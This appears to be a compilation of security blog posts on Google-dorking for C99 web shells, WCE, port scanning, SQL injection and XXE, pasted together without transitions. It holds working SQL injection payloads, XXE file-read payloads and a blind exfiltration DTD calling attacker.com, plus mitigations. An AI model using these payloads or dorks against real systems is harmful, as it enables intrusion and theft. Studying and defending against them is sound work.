This post is about identifying web back doors. Recently I made a research about PHP Malware C99 Shell and it seems to be very popular among lots of hacking groups and script kiddies.
C99 PHP Shell
C99Shell is a very well designed shell that practically lets you do about anything with the server, if you have the proper access rights. Here is a list with more web back doors, the link given is actually a google project and it is not going to be accessible trough corporate web gateways (with mal-ware filtering, URL filtering or Content filtering).
Google Dorks
Now days someone would not even have to hack a web server, the only thing they have to do is google already compromised servers by using Google Dorks and boom already got into the compromised machine. Usually the compromised machines found this way are not so interesting, because something that is valuable is better protected (well not always!) and the google crawlers will spot it after a relatively big amount of time. Which means that when you google a web back door and find one then it is already searched many times before you.
To be more specific a "Crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Google's main crawler is called Googlebot. This table lists information about the common Google crawlers you may see in your referrer logs, and how they should be specified in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives.
But if you want more fine-grained control, you can get more specific. For example, you might want all your pages to appear in Google Search, but you don't want images in your personal directory or hidden linkes such as web back door to be found and to be crawled. In this case, you can use robots.txt to disallow the user-agent Googlebot-image from crawling the files in your /personal directory (while allowing Googlebot to crawl all files), like this:
User-agent: Googlebot
Disallow:
User-agent: Googlebot-Image
Disallow: /personal
Someone can improve his/her web site crawling performance by simply adding directives for different crawlers, like this:
The truth is that most of the time the web site is going to crawled and be easily googled no matter what you do , an adversary will even be able to access none linked pages.
Web Back-door Google-Dorks using Google Alerts
Gaining access to web back doors in already compromised machines is easier done than thought. By simply using google alerts you can google all web back doors in the Internet and be notified through your google mail box. The best way to do it is by using the intitle:, intext:, inurl: search engine keywords. For example in order to google !C99madShell you simply type in the search:
intitle:!C99madShell
intext:!C99madShell
inurl:backdor_name.php
Note: If you want to limit the search to your web site you can obviously use the site:keyword. For example you can type intitle:!C99madShell site:www.maiavictim.com boom you will search only your web infrastructure.The following screen shots shows how easy is to automate Web Back Doors searching in a daily bases:
The best thing to do in every situation in order to protect yourself from being hacked and not finding out about, is to regularly check you web infrastructure using google alerts. This is also a very good start before you begin a penetration test!! to check for already compromised web infrastructure (I know I am brilliant).
Expand and automate the search using basic scripting
A good thing to do in order to protect yourself from script kiddies is to similarly identify all web back doors that are found in the link mention above (the google project). A very good way to automate the whole process is with scripting!!
So firstly you go to google and insert the intitle:!C99madShellthen the google search will return this:
If you copy the requested url you will see that it is exactly this one:
Now you can use curl to search using google dorks and save your search results in your hard disk or simply use firefox and save search results by doing a save as. You can do this with curl in your command prompt by typing:
curl -A Mozilla http://www.google.com/search?q=C99madSHell |html2text -width 10000000 | grep "Cached - Similar" | grep www.*.php
The following screen shot show the command (notice the html to text Linux utility I used):
The outcome of this command will be exactly the one shown below (after all the necessary grep-ing is done of course):
As you can see if you enlarge the picture (by simply clicking on the image) the search and filtering performed using curl is redirected into a file (after being properly greped to obtain only the desirable URL's). The output text file contains the potentially compromised web sites. Of course a manual filtering will have to be done to remove the references into URL's that are not really compromised.
Crontabing Google Searches
The next best thing to do in order to completely automate the process is to use crontab, a good crontab tutorial is clickmojo. As you already understand after reading this post you understand how toxic the Internet has become.
Here is how to run a google dork search at 6PM every night:
Note: You can grep or sed the obtained data to analyze the results and verify you logged only interesting URL's.
Epilog
Internet the last 2 years has become more and more toxic. Even users with no significant information to expose or online businesses start having a hard time to maintain their blogs or web sites without taking into consideration security seriously. Please feel free to post comments and give me back some feed on how useful you find my posts......
It is a Windows Credentials Editor. It manipulates Windows logon Sessions and it is considered to be an evolution of the Pass-the-Hash Toolkits by it author Hernan Ochoa. WCE Internals presented at RootedCon in Madrid on early 2011. This presentation explains the inner workings of WCE including how Windows store credentials in memory pre and post Windows Vista.
Post-Exploitation with WCE presented on July 2011. Simple and effective high-level presentation with test cases.
This article is about basic types of port scanning.
Port States (taking from Nmap man page)
open
An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port.
closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common.
unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
open|filtered
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
TCP SYN scan (with Hping2)
Scanner --- SYN (Sequence Number Set to 1) ---> Target
Scanner <- SYN/ACK (Sequence Number Set 0 and Acknowledgment Set 0) - Target
Scanner --- RST (Sequence Number Set Again to 1) ---> Target (Only if host listens)
Note: Scanner Viciously Dropped The Connection.
Or
Scanner --- RST/ACK ---> Target (Not used by Hping2 connection termination pattern)
Note: Graciously Terminated connection? (both parties have ti exchange an ACK flag), see below.
Only a SYN packet is sent to the target port.If a SYN/ACK is received from the target port, we can deduce that it is in the LISTENING state. If a RST/ACK is received, it usually indicates that the port is not listening, but we can deduce that the host is up. A RST/ACK or RST can be sent by the system performing the port scan so that a full connection is never established (also known as half open connections).
Half Open Connections in SYN scans
A connection can be "half-open", in which case one side has terminated its end, but the other has not. The side that has terminated can no longer send any data into the connection, but the other side can. The terminating side should continue reading the data until the other side terminates as well (always based in RFC's).
Connection termination in port scanning?
The connection termination phase uses, at most, a four-way handshake, with each side of the connection terminating independently. When an endpoint wishes to stop its half of the connection, it transmits a FIN packet, which the other end acknowledges with an ACK. Therefore, a typical tear-down requires a pair of FIN and ACK segments from each TCP endpoint. After both FIN/ACK exchanges are concluded, the terminating side waits for a timeout before finally closing the connection, during which time the local port is unavailable for new connections; this prevents confusion due to delayed packets being delivered during subsequent connections.It is also possible to terminate the connection by a 3-way handshake, when host A sends a FIN and host B replies with a FIN & ACK (merely combines 2 steps into one) and host A replies with an ACK. This is perhaps the most common method.
TCP ACK scan (with Hping2)
Scanner - ACK (Sequence Number Set 0 and Acknowledgment Set 0)-> Target
Scanner <--- RST (Sequence Number Set Again to 1) ---> Target
Or
Scanner <--- Connection Timeout or Sent ICMP Error --- Target
The ACK scan probe packet has only the ACK flag set (unless you use --scanflags with Nmap). When scanning unfiltered systems, open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don't respond, or send certain ICMP error messages back (type 3, code 1, 2, 3, 9, 10, or 13), are ussually labeled filtered by Nmap.
TCP Full Handshake or Connect scan (with Hping2)
Scanner --- SYN (Sequence Number Set to 0) ---> Target
Scanner <--- SYN/ACK (Sequence Number Set 0 and Acknowledgment Set 1) --- Target
Scanner --- ACK (Sequence Number Set 1 and Acknowledgment Set 1) ---> Target
Scanner --- FIN/ACK ---> Target
Scanner <--- ACK --- Target
Or
Scanner --- RST ---> Target (Nmap terminates the connection this way!)
Note: This type of scans might be logged from firewalls based always type and configuration of firewalls.
When a UDP packet is sent to a port that is not open, the system will respond with an ICMP port unreachable message. Most UDP port scanners use this scanning method, and use the absence of a response to infer that a port is open. However, if a port is blocked by a firewall, this method will falsely report that the port is open.
TCP NULL scan (with Hping2)
Scanner --- NULL ---> Target (All flags is set to 0)
Scanner <--- RST --- Target
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered from firewall that silently drops the
connection)
TCP Null scan This technique turns off all fl ags. Based on RFC 793, the target system should send back an RST for all closed ports.
TCP FIN scan (with Hping2)
Scanner --- FIN ---> Target
Scanner <--- RST --- Target
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered from firewall that silently drops the
connection)
TCP FIN scan This technique sends a FIN packet to the target port. Based on RFC 793 (http://ww.ietf.org/rfc/rfc0793.txt), the target system should send back an RST for all closed ports. This technique usually only works or used to worj on UNIXbased TCP/IP stacks.
TCP Xmas scan (with Hping2)
Scanner --- FIN,URG,PUSH ---> Target
Scanner <--- RST --- Target (For all closed ports, drop connection; works in UNIXboxs)
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered and silently drops the connection)
TCP Xmas Tree scan This technique sends a FIN, URG, and PUSH packet to the target port. Based on RFC 793, the target system should send back an RST for all closed ports.
TCP Window scan (with Hping2)
Scanner - ACK (Sequence Number Set 0 and Acknowledgment Set 0)-> Target
Scanner <--- RST (Sequence Number Set Again to 1) ---> Target
Or
Scanner <--- Connection Timeout or Sent ICMP Error --- Target
Window scan is exactly the same as ACK scan except that it exploits an implementation detail of certain systems to differentiate open ports from closed ones, rather than always printing unfiltered when a RST is returned. It does this by examining the TCP Window field of the RST packets returned. On some systems, open ports use a positive window size (even for RST packets) while closed ones have a zero window. So instead of always listing a port as unfiltered when it receives a RST back, Window scan lists the port as open or closed if the TCP Window value in that reset is positive or zero, respectively.
Scanner <--- Timeout Connection --- Target (Target host is filtered and silently drops the connection)
The Maimon scan is named after its discoverer, Uriel Maimon. He described the technique in Phrack Magazine issue #49 (November 1996). Nmap, which included this technique, was released two issues later. This technique is exactly the same as NULL, FIN, and Xmas scans, except that the probe is FIN/ACK. According to RFC 793 (TCP), a RST packet should be generated in response to such a probe whether the port is open or closed. However, Uriel noticed that many BSD-derived systems simply drop the packet if the port is open.
TCP Idle Scan (using Nmap)
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST with IP ID = 1 --- Zombie
Scanner --- Forged from zombie SYN ---> Target
Then when open port:
Target --- SYN/ACK ---> Zombie
Target <--- RST IP ID = 2 --- Zombie
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST IP ID = 3 --- Zombie
Or when closed or filtered port:
Target --- Timeout or RST ---> Zombie (With timeout or RST no ID is increased)
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST IP ID = 2 --- Zombie
Fundamentally, an idle scan consists of three steps that are repeated for each port:
Probe the zombie's IP ID and record it.
Forge a SYN packet from the zombie and send it to the desired port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented.
Probe the zombie's IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.
This article is created for completeness in this Blog as far as the Web Application Security is concerned and it is mainly focused in MS SQL injections.
What is SQL?
SQL was originally developed at IBM in the early 1970s but was not officially formalized until 1986 by the American National Standards Institute (ANSI). SQL was initially designed as a data query and manipulation language with limited functionality when compared to today’s feature-rich SQL dialects.
SQL Microsoft SQL Server
Transact-SQL (T-SQL) is Microsoft's and Sybase's proprietary extension to SQL. SQL, often expanded to Structured Query Language, is a standardized computer language that was originally developed by IBM for querying, altering and defining relational databases, using declarative statements. T-SQL expands on the SQL standard to include procedural programming, local variables, various support functions for string processing, date processing, mathematics, etc. and changes to the DELETE and UPDATE statements. These additional features make Transact-SQL Turing complete.
Transact-SQL is central to using Microsoft SQL Server. All applications that communicate with an instance of SQL Server do so by sending Transact-SQL statements to the server, regardless of the user interface of the application.
What is SQL injection?
SQL injection is a technique to maliciously exploit applications that use client-supplied data in SQL statements. Attackers trick the SQL engine into executing unintended commands by supplying specially crafted string input, thereby gaining unauthorized access to a database in order to view or manipulate restricted data.
Where to look for SQL Injection
You should look for SQL injections practically and realistically speaking in all variables included in a Web Application. SQL injection is an attack in which SQL code is inserted or appended into application user input parameters (the web application might also populate variables automatically that feed back end database) that are later passed to a back-end SQL server for parsing and execution. Any procedure that constructs SQL statements could potentially be vulnerable,as the diverse nature of SQL and the methods available for constructing it provide a wealth of coding options.
The primary form of SQL injection consists of direct insertion of code into parameters that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL
command, the malicious code is executed.
Why SQL Injection Happens
When a Web application fails to properly sanitize the parameters which are passed to dynamically created SQL statements it is possible for an attacker to alter the construction of back-end SQL statements. When an attacker is able to modify an SQL statement, the statement will execute with the same rights as the application user.
SQL Injection Happens usually for two reasons:
Dynamically generated SQL queries using concatination strings operators.
Un-sanitized input to this SQL queries.
Note: When using the SQL server to execute commands that interact with the operating system, the process will run with the same permissions as the component that executed the command.
Types of SQL Injections
According to my experience there are three types of SQL injections:
Error Based SQL injections (no input validation or output database error filtering).
Semi Blind/Error Based SQL injections (minor or no input validation but output database error filtering).
Blind SQL injections (strict both input and output filtering).
How you identify Error Based SQL Injections
You can identify an SQL injection by injecting the following five characters: ' , " , ) , ; , -- and all the combination of this five characters e.g );-- or '); -- e.t.c. If you inject one of this characters to a vulnerable variable then if the web application is not filtering the database SQL injection generated error more info is going to be revealed about the back end database.
Identify Number of Columns using the NULL data type
After successfully identifying a vulnerable variable the next best thing to do is to understand the structure of the select query. The structure of the SELECT query is revealed through the SQL verbose errors, so in order to find the structure we use the NULL character, because the NULL character can be casted into any data type each column of the abused SELECT query is. So by progressively increasing the amount of NULL characters eventually the query will execute as if there was a valid query (No database error will be returned ).
MSSQL:
‘ UNION SELECT NULL--
MSSQL:
‘ UNION SELECT NULL,NULL--
MSSQL:
‘ UNION SELECT NULL,NULL,NULL--
Poof -- no error comes back from SQL, the query was executed.
Note: You might also have to play with the comment characters at the end of the injected query some times.
Identify number of Columns using ORDER BY Clause (Transact-SQL)
In order to identify the name of the columns we use the ORDER BY Clause (Transact-SQL) in MSSQL. ORDER BY Clause specifies the sort order used on columns returned in a SELECT statement. The ORDER BY clause is not valid in views, inline functions, derived tables, and subqueries. The ORDER BY clause does not guarantee ordered results when these constructs are queried, unless ORDER BY is also specified in the query itself.
Syntax:
[ ORDER BY
{
order_by_expression
[ COLLATE collation_name ]
[ ASC | DESC ]
} [ ,...n ]
]
Specifies a column on which to sort. A sort column can be specified as a name or column alias, or a nonnegative integer representing the position of the name or alias in the select list. An integer cannot be specified when the order_by_expression appears in a ranking function. A sort column can include an expression, but when the database is in SQL Server (90) compatibility mode, the expression cannot resolve to a constant. Column names and aliases can be qualified by the table or view name.
In SQL Server, qualified column names and aliases are resolved to columns listed in the FROM clause. If order_by_expression is not qualified, the value must be unique among all columns listed in the SELECT statement.Multiple sort columns can be specified. The sequence of the sort columns in the ORDER BY clause defines the organization of the sorted result set.
The ORDER BY clause can include items that do not appear in the select list. However, if SELECT DISTINCT is specified, or if the statement contains a GROUP BY clause, or if the SELECT statement contains a UNION operator, the sort columns must appear in the select list. Additionally, when the SELECT statement includes a UNION operator, the column names or column aliases must be those specified in the first select list.
COLLATE {collation_name}
Specifies that the ORDER BY operation should be performed according to the collation specified in collation_name, and not according to the collation of the column as defined in the table or view. collation_name can be either a Windows collation name or a SQL collation name. For more information, see Collation Settings in Setup and Using SQL Server Collations. COLLATE is applicable only for columns of the char, varchar, nchar, and nvarchar data types.
ASC
Specifies that the values in the specified column should be sorted in ascending order, from lowest value to highest value. ASC is the default sort.
DESC
Specifies that the values in the specified column should be sorted in descending order, from highest value to lowest value.
Note1: ntext , text, image, or xmlcolumns cannot be used in an ORDER BY clause.
Note2: Null values are treated as the lowest possible values.
Note3: There is no limit to the number of items in the ORDER BY clause. However, there is a limit of 8,060 bytes for the row size of intermediate worktables needed for sort operations. This limits the total size of columns specified in an ORDER BY clause.
Note4: When used together with a SELECT...INTO statement to insert rows from another source, the ORDER BY clause does not guarantee the rows are inserted in the specified order.
Extended malicious SELECT query using ORDER BY:
MSSQL:
' ORDER BY 1 --
MSSQL:
' ORDER BY 2 --
MSSQL:
' ORDER BY 3 --
We do that untill an error occures (just like the NULL queries) and that way you learn the number of columns.
Identify Type of Columns using version variable
Similar technique can be used with the version system variable:
MSSQL:
‘ UNION SELECT @@version,NULL,NULL--
ORACLE:
‘ UNION SELECT banner,NULL,NULL FROM v$version--
Note: that Oracle doesn’t support this schema. When targeting an Oracle database, the attack would be identical in every other way. However, you would use the query. When multiple columns are returned from a target table, these can be concatenated into a single column. This makes retrieval more straightforward,
because it requires identifi cation of only a single varchar field in the original query:
Identify Name of Columns using HAVING (Transact-SQL)
HAVING (Transact-SQL) specifies a search condition for a group or an aggregate. HAVING can be used only with the SELECT statement. HAVING is typically used in a GROUP BY clause. When GROUP BY is not used, HAVING behaves like a WHERE clause.
Syntax:
[ HAVING ]
Arguments search_condition
Specifies the search condition for the group or the aggregate to meet. The text, image, and ntext data types cannot be used in a HAVING clause.
Malicious queries using HAVING to identify columns:
MSSQL:
‘ HAVING 1=1--
MSSQL:
‘GROUP BY table.column_name1 HAVING 1=1 --
MSSQL:
‘GROUP BY table.column_name1, table.column_name2 HAVING 1=1 --
Note:Now when successfully enumerating all column names no error should be returned (meaning that the query should be successful).
Identify Data Type of Columns using different data types
The next step would be to identify the type of the data in each column. Lets say that based on our experience the query is possible to contain string type characters. So we "scan" each column with char 'a':
MSSQL:
‘ UNION SELECT ‘a’, NULL, NULL--
MSSQL:
‘ UNION SELECT NULL, ‘a’, NULL--
MSSQL:
‘ UNION SELECT NULL, NULL, ‘a’ --
Poof -- no casting error comes back from SQL.
Note: In Oracle databases, every SELECT statement must include a FROM attribute, so injecting UNION SELECT NULL produces an error regardless of the number of columns. You can satisfy this requirement by selecting from the globally accessible table DUAL. For example in Oracle you can inject:
ORACLE:
‘ UNION SELECT NULL FROM DUAL--
ORACLE:
‘ UNION SELECT NULL,NULL,'a' FROM DUAL--
ORACLE:
‘ UNION SELECT NULL,'a',NULL FROM DUAL--
Poof -- no casting error comes back from SQL.
Identify Data Type of Columns using SUM (Transact-SQL)
SUM (Transact-SQL) returns the sum of all the values, or only the DISTINCT values, in the expression. SUM can be used with numeric columns only. Null values are ignored. May be followed by the OVER Clause (Transact-SQL).
MSSQL:
‘ UNION SELECT SUM(column_name1) FROM table --
MSSQL:
‘ UNION SELECT SUM(column_name2) FROM table --
MSSQL:
‘ UNION SELECT SUM(column_name3) FROM table --
Poof -- no casting error comes back from SQL.
Note: The SUM function attempts to perform a second query and combine the results with those of the original.
XML External Entity (XXE) Injection — Updated 2026
XML External Entity (XXE) Injection
DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML
XXECWE-611A5:2021SSRFBlind OOBUpdated 2026
Intro
External entity injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. This type of attack is well documented and known since 2002, though it continues to appear in modern applications — particularly in SOAP services, file upload handlers, and legacy enterprise integrations.
Taxonomy (2026): XXE was categorized as OWASP A4:2017 — XXE (its own dedicated category). In OWASP Top 10 2021, it was merged into A5:2021 — Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).
XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.
An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).
When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.
This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.
When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.
How the XML parser handles XXEs
An XXE is meant to be converted to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity's replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification, relative URIs are relative to the location of the resource within which the entity declaration occurs.
This is defined to be the external entity containing the < which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header).
Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inline inside an XML document, or as an external reference.
In the absence of additional information outside the scope of this specification within the resource, the base URI of a resource is always the URI of the actual resource returned. In other words, it is the URI of the resource retrieved after all redirection has occurred.
Figure 1 — XXE attack flow: from malicious DTD to data exfiltration
An actual example of XXE
Based on what is already explained about how the XML parser handles XXE, in the following example the XML document will make an XML parser read /etc/passwd and expand it into the content of the PutMeHere tag:
See how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser, the passwd file contents will be loaded and returned.
Note: The XML document is not valid if the &xxe; reference does not start with the & character and terminate with the ; character. The attack is limited to files containing text that the XML parser will allow at the place where the external entity is referenced. Files containing non-printable characters, and files with randomly located less-than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
Identifying XXE attack strings
The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return possibly verbose errors, helping you identify the XML structures.
#
Payload
Purpose
1
'
Single quote — break attribute values
2
''
Double single quote
3
"
Double quote — break attribute values
4
""
Double double quote
5
<
Open tag — trigger parser error
6
>
Close tag
7
]]>
CDATA end — premature closure
8
]]>>
Malformed CDATA end
9
<!--/-->
Malformed comment
10
/-->
Partial comment close
11
-->
Comment close without open
12
<!--
Comment open without close
13
<!
Incomplete declaration
14
<![CDATA[ / ]]>
CDATA section — bypass parsing
CDATA sections:<![CDATA[ / ]]> — CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. Characters enclosed in a CDATA section are not parsed by the XML parser.
Exploiting XXE vulnerabilities
Let's suppose there is a web application using XML-style communication to perform user login. This is done by creating and adding a new <user> node on an XML database file. We will try to inject XML that breaks the schema. Some or all of the following attempts will generate an XML error, helping us understand the XML schema.
Injecting <!-- after the username causes the parser to interpret everything after it as a comment, potentially consuming the closing tag and credentials field — generating an informative error message that reveals schema structure.
When the XML document is parsed, the CDATA delimiters are eliminated, reconstructing a <script> tag. If the tag contents are reflected in an HTML page, XSS is achieved.
A real attack scenario
XXE attacks can result in OS file read access, similar to a path traversal attack. Consider a sophisticated e-banking application that uses the browser as a thin client, consuming a web service after successful login. The transaction XML message carries the username and password back and forth alongside the transaction data.
The &xxefca0a; entity reference in the <principal> tag causes the parser to read /etc/passwd and embed its contents into the XML. The server response — whether a success or error message — will contain the file contents concatenated with the username.
Figure 2 — XXE escalation: from file read to full internal network pivot
The next step after initial file exfiltration would be to map the outbound local firewall rules to see what traffic is allowed to go out. Download the /etc/hosts file of the compromised web server, then start forwarding traffic to identified internal machines. As soon as you get a response back, you know that the specific machine is actively responding. Then rotate through all ports to identify which services are accessible. This maps the egress filtering done by the application server's local firewall.
After mapping the firewall rules, the next step would be to fingerprint surrounding web servers using DirBuster directory lists, or further escalate using HTTPS to fingerprint based on SSL/TLS error responses, and then deliver payloads or perform path traversal / SQL injection attacks through the XML parser.
What can you do with a successful XXE attack
Use the application as a proxy, retrieving sensitive content from any web servers the application can reach, including those on private non-routable address space.
Exploit vulnerabilities on back-end web applications, provided they can be exploited via URIs (directory brute-forcing, SQL injection, path traversal, etc.).
Test for open ports on back-end systems by cycling through IP addresses and port numbers. Timing differences can be used to infer the state of requested ports. Service banners may appear in application responses.
Map firewall rules on other company extranets.
DoS internal company web server machines (e.g. requesting /dev/random or recursive entity expansion — the "Billion Laughs" attack).
Hide port scans by mixing them with the vulnerable web server's legitimate traffic.
Access cloud metadata endpoints to steal IAM credentials (AWS, GCP, Azure).
Connect to internal services like syslog daemons, proxy admin panels, or unprotected file shares via UNC paths.
Launch blind SQL injection attacks through the parser against surrounding database servers.
Modern attack vectors New 2026
Blind XXE via out-of-band (OOB) exfiltration
When the application does not return the parsed entity content in its response (no direct output), blind XXE via OOB channels can still exfiltrate data. The technique uses parameter entities to load an external DTD from an attacker-controlled server, which in turn constructs a URL containing the target file's contents and forces the parser to request it.
# Malicious payload sent to the application:<?xml version="1.0"?><!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]><root>test</root># Contents of evil.dtd hosted on attacker.com:<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM
'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.
Figure 3 — Blind XXE via out-of-band (OOB) data exfiltration
XXE via file upload
Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:
SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.
Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).
# Original JSON request:POST /api/login HTTP/1.1
Content-Type: application/json
{"username": "admin", "password": "test"}# Switched to XML with XXE:POST /api/login HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<username>&xxe;</username>
<password>test</password>
</root>
Mitigation of XXE vulnerabilities Updated
The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:
# Use defusedxml — drop-in replacement that blocks XXE by default
import defusedxml.ElementTree as ET
tree = ET.parse('input.xml')
# Or with lxml, disable network access and entity resolution
from lxml import etree
parser = etree.XMLParser(
resolve_entities=False,
no_network=True,
dtd_validation=False,
load_dtd=False
)
// Disable entity loading before any XML parsing
libxml_disable_entity_loader(true);
// For SimpleXML:
$xml = simplexml_load_string($data, 'SimpleXMLElement',
LIBXML_NOENT | LIBXML_NONET);
Important:libxml_disable_entity_loader() is deprecated in PHP 8.0+ because libxml2 >= 2.9.0 disables external entity loading by default. However, always verify your specific PHP and libxml2 versions — older deployments may still be vulnerable.
General hardening principles
Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.
Summary
When an application is vulnerable to XXE, the attacker may be capable of gaining access to the web server OS file system, causing DoS attacks (via /dev/random or recursive entity expansion), performing SSRF against internal services, exfiltrating data via out-of-band channels, or even achieving XSS through XML-to-HTML reflection. Modern XXE often comes through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.